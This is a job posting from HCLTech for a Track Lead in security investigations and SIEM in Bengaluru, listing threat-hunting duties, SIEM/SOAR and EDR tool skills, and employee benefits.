Track Lead - Security Investigations, SIEM
India
Apply now
Job Description
Track Lead - Security Investigations, SIEM
Bengaluru, Karnataka

Job Summary

The Track Lead (Support & Operations) plays a pivotal role in managing security event investigations and implementing technical solutions within the organization. This position focuses on enhancing operational efficiencies, ensuring client satisfaction, and fostering a culture of continuous improvement and innovation among teams. The Track Lead is instrumental in aligning operational goals with organizational objectives while empowering teams to meet client SLAs effectively.

Responsible for proactively identifying, investigating, and mitigating advanced cyber threats that evade traditional, alertdriven security controls. The role focuses on hypothesis-driven and intelligence-led threat hunting across endpoint, network, identity, and cloud environments to reduce dwell time and enhance detection maturity.

Key Responsibilities

1. Implement And Optimize Soar Solutions To Automate Security Event Investigations, Ensuring Timely And Accurate Incident Response While Enhancing Overall Operational Efficiency.
2. Develop And Maintain Comprehensive Reporting Systems Using Siem Tools To Provide Insights Into Security Incidents And Operational Performance, Facilitating Informed Decision-Making.
3. Lead And Mentor The Support Team By Fostering Transparent Communication Of Project Goals And Encouraging The Adoption Of Best Practices In Security Operations.
4. Collaborate With Clients To Thoroughly Understand Their Security Needs, Ensuring The Support Team Delivers Tailored Solutions That Exceed Client Expectations.
5. Drive Innovation By Identifying Opportunities For Process Improvements And Implementing New Ideas That Enhance The Effectiveness Of Security Operations.

Conduct hypothesis-based and IOC-driven threat hunting across:   

Endpoint (EDR/XDR)  

SIEM / Log Management platforms  

Network telemetry (NDR)  

Identity logs (AD / Entra ID)  

Cloud platforms (Azure, AWS, M365)  

Identify stealthy and advanced threats, including:   

Living‑off‑the‑Land (LotL) techniques  

Advanced Persistent Threats (APTs)  

Lateral movement and privilege escalation  

Insider threat indicators  

Develop and execute MITRE ATT&CK–aligned hunting hypotheses  

Convert hunting findings into:   

Security incidents  

New detection rules (SIEM / EDR / XDR)  

Change or service requests (misconfigurations, logging gaps)  

Collaborate with SOC, Incident Response, and Threat Intelligence teams  

Produce hunting reports and KPIs (dwell time reduction, hunts to detections, incidents generated)   

 

 

 

 

Skill Requirements

1. Strong Proficiency In Security Event Investigation And Soar Technologies.
2. In-Depth Knowledge Of Siem Tools And Their Application In Operational Environments.
3. Excellent Problem-Solving Abilities And A Strong Understanding Of Client Relationship Management.
4. Proven Leadership Skills With The Ability To Mentor And Empower Teams Effectively.

Strong expertise in SIEM/SOAR platforms (Splunk, Microsoft Sentinel, Chronicle, Palo Alto XSIAM)  

Hands-on experience with EDR/XDR tools (Microsoft XDR, CrowdStrike, SentinelOne, Palo Alto Cortex)  

Proficiency in KQL / SPL / advanced hunting queries  

Deep understanding of MITRE ATT&CK techniques and TTPs  

Strong OS knowledge: Windows, Linux, macOS  

Basic scripting skills (PowerShell / Python preferred)  

Cloud security exposure (Azure, AWS, M365 Defender) 

Other Requirements

1. Optional But Valuable Certifications: Certified Information Systems Security Professional (Cissp), Security+ Certification, Or Any Relevant Soar Or Siem Certifications
Apply now
Information at a Glance

Why HCLTech?

At HCLTech, you'll supercharge your potential. You'll find your career. And you'll find your spark. All at a place that knows that helping its customers stay on top starts by putting its people first.

HCLTech is a global technology company, home to more than 226,300 people across 60 countries, delivering industry-leading capabilities centered around digital, engineering, cloud and AI, powered by a broad portfolio of technology services and products. We work with clients across all major verticals, providing industry solutions for Financial Services, Manufacturing, Life Sciences and Healthcare, Technology and Services, Telecom and Media, Retail and CPG, and Public Services. Consolidated revenues as of 12 months ending December 2025 totaled $14.5 billion.
23 Benefits At HCLTech, we believe in empowering our employees with comprehensive benefits that support their professional growth and enhance their well-being. When you sign up for a career with us, you gain access to: https://rmkcdn.successfactors.com/147eb21f/a701dca9-f32d-4fc9-9447-6.svg Industry-benchmarked compensation https://rmkcdn.successfactors.com/147eb21f/b0c54381-ddcc-4a33-9b35-9.svg Best-in-class healthcare benefits https://rmkcdn.successfactors.com/147eb21f/b73027be-7aae-4d36-a090-4.svg Personal time off https://rmkcdn.successfactors.com/147eb21f/d5b4fdfd-2e99-4e26-9878-9.svg Maternity and paternity benefits https://rmkcdn.successfactors.com/147eb21f/3d42b0fc-4652-435a-9ece-c.svg Access to skills / higher education programs/resources https://rmkcdn.successfactors.com/147eb21f/aeddeaf2-9e25-4584-ad11-d.svg Discounts on products and services via Benefit Box https://rmkcdn.successfactors.com/147eb21f/a9609a3b-2700-4b3c-9d90-a.svg Participate in CSR programs and live life with a purpose https://rmkcdn.successfactors.com/147eb21f/c6e33851-710f-4634-bd69-f.svg Opportunities to grow and advance your career Note: The benefits listed above vary depending on the nature of your employment and the country where you work. Some benefits may be available in some countries but not in all.